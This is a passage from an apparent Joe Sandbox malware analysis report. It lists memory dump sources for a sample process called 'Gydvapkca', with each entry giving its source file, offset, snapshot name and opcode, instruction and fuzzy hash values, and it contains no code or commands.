                          • Source File: 00000003.00000002.2256339033.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5dd0000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2a68a82de32fae2ceedbbf9e208d3f3a5f1b7e30b213bbd0b35ecd581cd31199
                          • Instruction ID: 7fc141f4725c568a890bbe04ba01da36f5b020080eba6ce24075002a7e53625c
                          • Opcode Fuzzy Hash: 2a68a82de32fae2ceedbbf9e208d3f3a5f1b7e30b213bbd0b35ecd581cd31199
                          • Instruction Fuzzy Hash: 083106366001149FCB05DF58D888EA9BBB6FF48720F1680A9F5099B372C731EC55CB80
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224336190.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2210000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 620e486b159b3195a887aa9c6e8d621474363a8b90f2f113ba1bd0d9a2a97632
                          • Instruction ID: ff04db28ed2cb8bc2ae68166b1849f2d76e9fe82f0af41b7e32cb969308f0e23
                          • Opcode Fuzzy Hash: 620e486b159b3195a887aa9c6e8d621474363a8b90f2f113ba1bd0d9a2a97632
                          • Instruction Fuzzy Hash: A741C374E15209DFE705EFA9C588BAEBBF1EF95308F00C4A6D401A7254C7784948CF52
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224336190.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2210000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d2490a0a77cd5f3f51ae8a880e4e1d5005d3f642446d6131b715b9961bda1250
                          • Instruction ID: b54f28debafd1769bfb507ff1ac8624fb8a653930408d0a9c79509a086a43fbb
                          • Opcode Fuzzy Hash: d2490a0a77cd5f3f51ae8a880e4e1d5005d3f642446d6131b715b9961bda1250
                          • Instruction Fuzzy Hash: 11318C74E10109DFEB04EF99D1C8BAEBBF2EB99308F10C465E915A7258CB785944CF52
                          Memory Dump Source
                          • Source File: 00000003.00000002.2223027376.000000000217D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0217D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_217d000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1ea35dfa7e5f81895ddc0e342632e98d5f4cbe59171f91878350b5c6689bc32a
                          • Instruction ID: 940c4055abc7c228d79dcb80ab53a5c761666358bfbe49127ec0123585ec5592
                          • Opcode Fuzzy Hash: 1ea35dfa7e5f81895ddc0e342632e98d5f4cbe59171f91878350b5c6689bc32a
                          • Instruction Fuzzy Hash: E521D0B2584248DFDB15DF14E9C0B26BF75FFC8328F248669E9090A256C336D456CBA2
                          Memory Dump Source
                          • Source File: 00000003.00000002.2223576699.000000000218D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0218D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_218d000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e72e78f29308c5b70182a1f0df548b61d39522d20f02e43fc5401e5cf333c57f
                          • Instruction ID: c3361dc74b1f4f7fdd1314ce45cf378705a2160d217509f1cd390148c9c8672b
                          • Opcode Fuzzy Hash: e72e78f29308c5b70182a1f0df548b61d39522d20f02e43fc5401e5cf333c57f
                          • Instruction Fuzzy Hash: 52210771644344DFDB15EF24E9C4B2ABF65FB88314F24C569E9095B286C336D806CFA2
                          Memory Dump Source
                          • Source File: 00000003.00000002.2223576699.000000000218D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0218D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_218d000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d2b6c8bbc309eb201f9c989397ab21aa528a3b012189c6f09e7b0cec359ad20c
                          • Instruction ID: 3300ea69ee5d729a3b984f7fd14fb473b36c3eb0012d5f375f6263fe24e33539
                          • Opcode Fuzzy Hash: d2b6c8bbc309eb201f9c989397ab21aa528a3b012189c6f09e7b0cec359ad20c
                          • Instruction Fuzzy Hash: 62217C7554D3C08FCB03DF24D990715BF71AF46210F2981DAD8888B2A7C339980ACB62
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224336190.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2210000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 214c5f403a6f3ff009b2509f338ae1015c2e39d68cd69242407d46d9cbd0de20
                          • Instruction ID: 304bb3c31afcb2014879cd4ce8e8e149cf94448c10ad000c125f4c9171aa9a5b
                          • Opcode Fuzzy Hash: 214c5f403a6f3ff009b2509f338ae1015c2e39d68cd69242407d46d9cbd0de20
                          • Instruction Fuzzy Hash: 751137B0D14209DBCB14CFD9D845AEEBBF6FF98310F14842AD905B3214EB745A54CBA1
                          Memory Dump Source
                          • Source File: 00000003.00000002.2223027376.000000000217D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0217D000, based on PE: false